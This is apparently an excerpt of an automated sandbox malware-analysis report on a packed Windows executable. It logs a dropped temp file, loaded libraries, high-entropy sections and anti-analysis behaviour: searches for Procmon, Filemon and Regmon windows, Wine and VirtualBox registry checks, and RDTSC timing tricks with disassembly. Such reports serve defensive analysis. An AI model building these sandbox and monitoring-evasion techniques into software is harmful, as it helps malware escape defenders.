          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe "C:\Users\user~1\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSection loaded: sspicli.dllJump to behavior
          Source: file.exeStatic file information: File size 2985472 > 1048576
          Source: file.exeStatic PE information: Raw size of nbbggopa is bigger than: 0x100000 < 0x2ad600
          Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: AU963ROPSBOYUMXP3FF.exe, 0000000A.00000002.1653281142.0000000001002000.00000040.00000001.01000000.00000006.sdmp, AU963ROPSBOYUMXP3FF.exe, 0000000A.00000003.1519965590.00000000055E0000.00000004.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 6.2.file.exe.740000.0.unpack :EW;.rsrc :W;.idata :W;nbbggopa:EW;qiwuxnts:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nbbggopa:EW;qiwuxnts:EW;.taggant:EW;
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeUnpacked PE file: 10.2.AU963ROPSBOYUMXP3FF.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W;vgffvxyy:EW;exxzjjll:EW;.taggant:EW; vs :ER;.rsrc:W;
          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: real checksum: 0x2b584d should be: 0x2b5ffe
          Source: file.exeStatic PE information: real checksum: 0x2da621 should be: 0x2da3ed
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .rsrc
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name: nbbggopa
          Source: file.exeStatic PE information: section name: qiwuxnts
          Source: file.exeStatic PE information: section name: .taggant
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name:
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name: .idata
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name: vgffvxyy
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name: exxzjjll
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name: .taggant
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01196195 push esi; mov dword ptr [esp], eax10_2_01195EB3
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01196195 push 23031881h; mov dword ptr [esp], ecx10_2_01195EBB
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118C216 push ecx; ret 10_2_0118C46F
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0100E7B0 push ecx; mov dword ptr [esp], 0B561D21h10_2_0100EDAA
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0100E7B0 push 7E3061EEh; mov dword ptr [esp], ebp10_2_0100EDB9
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0100E7B0 push edx; mov dword ptr [esp], 7B3D025Dh10_2_0100EDD5
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01189F02 push 096E1BBBh; mov dword ptr [esp], edx10_2_01189F1B
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01189F02 push eax; mov dword ptr [esp], 2E8F92C1h10_2_01189F36
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118BF76 push ecx; ret 10_2_0118C46F
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0100D108 push ecx; mov dword ptr [esp], edx10_2_0100D125
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0119E110 push esi; ret 10_2_0119E11F
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01197113 push 0A1FE024h; mov dword ptr [esp], edi10_2_011981D4
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01197113 push edi; mov dword ptr [esp], ecx10_2_0119A8B4
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01197113 push 660BAA5Ah; mov dword ptr [esp], edx10_2_0119A8C8
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118F114 push 241990FDh; mov dword ptr [esp], ebx10_2_0118F203
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0119810C push ebx; mov dword ptr [esp], ecx10_2_011989CC
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0100C116 push edx; mov dword ptr [esp], ebx10_2_0100C125
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0101111D push esi; mov dword ptr [esp], 239079C4h10_2_01011124
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0101111D push esi; mov dword ptr [esp], 5FF315E0h10_2_0101112F
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01194128 push 0707B204h; mov dword ptr [esp], edx10_2_011946AC
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118D12E push 2B4138D0h; mov dword ptr [esp], ebx10_2_0118D157
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118C178 push ecx; ret 10_2_0118C187
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0119817B push 2D085DE1h; mov dword ptr [esp], eax10_2_0119B3EF
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0119817B push 60867CD6h; mov dword ptr [esp], esp10_2_0119B3FD
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0119718F push edx; mov dword ptr [esp], ebx10_2_0119783A
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0119718F push 2C4F3C21h; mov dword ptr [esp], edx10_2_01197842
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01196181 push edx; mov dword ptr [esp], eax10_2_01199813
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01196181 push 24BDA850h; mov dword ptr [esp], ebx10_2_0119981B
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_01198186 push ebp; mov dword ptr [esp], esp10_2_0119839B
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118D1BF push 6B5450DFh; mov dword ptr [esp], edi10_2_0118D1C4
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118F1B4 push 739B82A6h; mov dword ptr [esp], ecx10_2_0118F1C3
          Source: file.exeStatic PE information: section name: entropy: 7.974060215708327
          Source: AU963ROPSBOYUMXP3FF.exe.6.drStatic PE information: section name: entropy: 7.8086308007599685
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeJump to dropped file

          Boot Survival

          barindex
          Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: RegmonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: FilemonClassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: FilemonclassJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeWindow searched: window name: RegmonclassJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
          Tries to detect sandboxes / dynamic malware analysis system (registry check)
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9128C8 second address: 9128CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912CDA second address: 912CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912CE2 second address: 912CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912CEB second address: 912CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912E3E second address: 912E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D778E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912E5A second address: 912E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D8F594h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912E72 second address: 912E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FAF74D778E1h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912E8F second address: 912E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912FFD second address: 913004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913004 second address: 913034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FAF74D8F59Fh 0x0000000f jmp 00007FAF74D8F58Dh 0x00000014 jmp 00007FAF74D8F58Ch 0x00000019 js 00007FAF74D8F588h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 913034 second address: 91303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91303A second address: 91303E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916D2D second address: 916D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916D31 second address: 916D49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D8F594h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916D49 second address: 916D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916E09 second address: 916E1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916E1E second address: 916E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916E24 second address: 916E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917008 second address: 91705F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAF74D778D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FAF74D778D8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D1F08h], esi 0x0000002c push 00000000h 0x0000002e mov ecx, dword ptr [ebp+122D29B4h] 0x00000034 push 3B845D78h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FAF74D778E8h 0x00000040 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91705F second address: 917125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3B845DF8h 0x00000010 push ebx 0x00000011 jo 00007FAF74D8F58Ch 0x00000017 mov edi, dword ptr [ebp+122D1DA7h] 0x0000001d pop esi 0x0000001e push 00000003h 0x00000020 jnl 00007FAF74D8F591h 0x00000026 jns 00007FAF74D8F58Ch 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D5A4Dh], esi 0x00000034 push 00000003h 0x00000036 movsx esi, ax 0x00000039 push BB5E996Ah 0x0000003e jne 00007FAF74D8F59Fh 0x00000044 xor dword ptr [esp], 7B5E996Ah 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007FAF74D8F588h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 jg 00007FAF74D8F586h 0x0000006b lea ebx, dword ptr [ebp+1244BC03h] 0x00000071 mov edi, dword ptr [ebp+122D2BFEh] 0x00000077 mov dx, D37Ch 0x0000007b xchg eax, ebx 0x0000007c push eax 0x0000007d push edx 0x0000007e push eax 0x0000007f push eax 0x00000080 pop eax 0x00000081 pop eax 0x00000082 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917207 second address: 91720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91720B second address: 917259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007FAF74D8F58Fh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FAF74D8F58Ah 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c jmp 00007FAF74D8F592h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917259 second address: 91725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91725D second address: 91726D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91726D second address: 917271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 927DAA second address: 927DB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937A76 second address: 937A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937A7A second address: 937A80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9092B0 second address: 90932D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF74D778E8h 0x0000000b jno 00007FAF74D778F2h 0x00000011 jnp 00007FAF74D778EAh 0x00000017 jmp 00007FAF74D778DEh 0x0000001c jbe 00007FAF74D778D6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007FAF74D778E2h 0x0000002b jmp 00007FAF74D778DEh 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909315 second address: 90931B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90931B second address: 90932D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D778DEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935CDE second address: 935CE8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF74D8F586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935E53 second address: 935E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
